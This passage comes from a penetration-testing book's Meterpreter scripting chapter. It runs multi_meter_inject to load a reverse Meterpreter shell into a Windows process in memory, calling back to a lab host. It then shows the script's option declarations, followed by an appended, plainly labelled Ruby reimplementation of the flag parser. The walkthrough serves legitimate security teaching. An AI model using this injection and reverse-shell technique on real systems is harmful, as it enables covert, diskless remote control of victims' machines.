Meterpreter Scripting    237

We’ll inject our new Meterpreter shell into the iexplorer.exe process. This will spawn a second Meterpreter console completely within memory and will never write data to the disk.

Let’s run the multi_meter_inject command using some of the switches we reviewed earlier to see if it works:

meterpreter > run multi_meter_inject -mp 2808 -mr 172.16.32.129 -p 443

[*] Creating a reverse meterpreter stager: LHOST=172.16.32.129 LPORT=443
[*] Injecting meterpreter into process ID 2808
[*] Allocated memory at address 0x03180000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (749056 bytes) to 172.16.32.170
[+] Successfully injected Meterpreter in to process: 2808
[*] Meterpreter session 3 opened (172.16.32.129:443 -> 172.16.32.170:1098) at Tue Nov 30 22:37:29 -0500 2010

meterpreter >

As this output indicates, our command was successful and a new Meterpreter session has been opened, as shown by the “Meterpreter session 3 opened” line.

Now that you understand what this script can do, let’s examine how it works. We’ll break the script into chunks to help us parse its commands and overall structure.

First, variables and definitions are defined and the flags we want to pass to Meterpreter are set up:

# $Id: multi_meter_inject.rb 10901 2010-11-04 18:42:36Z darkoperator $
# $Revision: 10901 $
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-----------------------------------------------------------------------------
################## Variable Declarations ##################

@client = client
lhost    = Rex::Socket.source_address("1.2.3.4")
lport    = 4444
lhost    = "127.0.0.1"

pid = nil

multi_ip = nil
multi_pid = []
payload_type = "windows/meterpreter/reverse_tcp"
start_handler = nil

@exec_opts = Rex::Parser::Arguments.new(
        "-h"  => [ false,  "Help menu." ],
        "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)"],
        "-m"  => [ false,  "Start Exploit multi/handler for return connection"],
        "-pt" => [ true,   "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
        "-mr" => [ true,   "Provide Multiple IP Addresses for Connections separated by comma."],
        "-mp" => [ true,   "Provide Multiple PID for connections separated by comma one per IP."]
)
meter_type = client.platform
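The flag table above only declares the switches; the parsing itself happens in Rex::Parser::Arguments, which is not available outside Metasploit. The following added example (not code from the book or from the Metasploit project) reimplements that parser’s behaviour in a small stand-in class so the declarations can be exercised on their own: each entry maps a flag to [takes-a-value?, description], parse yields (option, index, value) for every argument, and the comma-separated -mr and -mp lists are split and paired one PID per IP, rejecting a count mismatch. The class name MiniArguments and the helper parse_meter_opts are invented here; the flag names, descriptions and defaults mirror the script’s declarations.

```ruby
# Added example, not part of multi_meter_inject.rb.
# MiniArguments is an invented stand-in for Rex::Parser::Arguments; it keeps
# the same constructor shape and the same (opt, idx, val) yield contract.
class MiniArguments
  # fmt: { "-p" => [takes_value, "description"], ... }
  def initialize(fmt)
    @fmt = fmt
  end

  # Walks argv; options yield (flag, index, value), bare words yield (nil, index, word).
  def parse(args)
    i = 0
    while i < args.length
      arg = args[i]
      idx = i
      if arg.start_with?("-")
        spec = @fmt[arg]
        raise ArgumentError, "unknown option #{arg}" unless spec
        val = nil
        if spec[0]
          val = args[i + 1]
          raise ArgumentError, "#{arg} requires a value" if val.nil? || val.start_with?("-")
          i += 1
        end
        yield arg, idx, val
      else
        yield nil, idx, arg
      end
      i += 1
    end
  end

  # Renders the help text the -h flag would print.
  def usage
    @fmt.map { |opt, (_, desc)| "#{opt.ljust(4)} #{desc}" }.join("\n")
  end
end

# Same table as the script's @exec_opts declaration.
EXEC_OPTS = MiniArguments.new(
  "-h"  => [false, "Help menu."],
  "-p"  => [true,  "The port on the remote host where Metasploit is listening (default: 4444)"],
  "-m"  => [false, "Start Exploit multi/handler for return connection"],
  "-pt" => [true,  "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
  "-mr" => [true,  "Provide Multiple IP Addresses for Connections separated by comma."],
  "-mp" => [true,  "Provide Multiple PID for connections separated by comma one per IP."]
)

# Invented helper: returns the settings the script's variables would hold
# after its option loop ran over args. Defaults match the script's declarations.
def parse_meter_opts(args)
  opts = {
    lhost: "127.0.0.1", lport: 4444,
    payload_type: "windows/meterpreter/reverse_tcp",
    start_handler: false, help: false,
    multi_ip: nil, multi_pid: []
  }
  EXEC_OPTS.parse(args) do |opt, _idx, val|
    case opt
    when "-h"  then opts[:help] = true
    when "-p"  then opts[:lport] = Integer(val)
    when "-m"  then opts[:start_handler] = true
    when "-pt" then opts[:payload_type] = val
    when "-mr" then opts[:multi_ip]  = val.split(",").map(&:strip)
    when "-mp" then opts[:multi_pid] = val.split(",").map { |p| Integer(p.strip) }
    end
  end
  # "one per IP": every address needs exactly one PID, so unequal lists are an error.
  if opts[:multi_ip] && opts[:multi_ip].length != opts[:multi_pid].length
    raise ArgumentError, "-mr and -mp must contain the same number of entries"
  end
  opts
end

if __FILE__ == $0
  # Constructed input: the switches used in the session shown above.
  p parse_meter_opts(%w[-mp 2808 -mr 172.16.32.129 -p 443])
  puts EXEC_OPTS.usage
end
```

Running the block with the switches from the session above yields lport 443, multi_ip ["172.16.32.129"] and multi_pid [2808], which is the pairing the script later iterates over; passing two PIDs for one address raises before anything else runs.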